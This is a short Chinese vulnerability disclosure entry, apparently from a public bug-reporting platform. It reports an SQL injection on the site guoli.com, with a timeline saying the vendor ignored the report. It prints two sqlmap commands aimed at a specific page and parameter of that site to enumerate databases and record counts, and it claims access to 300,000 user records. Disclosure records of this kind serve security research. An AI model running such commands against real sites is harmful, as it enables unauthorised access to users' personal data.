漏洞概要
关注数(24)
关注此漏洞
漏洞标题:果粒网主站某处SQL注入
提交时间:2015-07-15 14:29
修复时间:2015-08-29 14:30
公开时间:2015-08-29 14:30
漏洞类型:网络设计缺陷/逻辑错误
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情
披露状态:
2015-07-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-29: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
123
详细说明:
果粒网某处SQL注入,可获30万用户信息+百万级数据
Sqlmap -u "http://www.guoli.com/cy/index.php?&subject=00&longterm=2" --dbs
Sqlmap -u "http://www.guoli.com/cy/index.php?&subject=00&longterm=2" --count
好多哦
太多了 不跑了
漏洞证明:
修复方案:
漏洞回应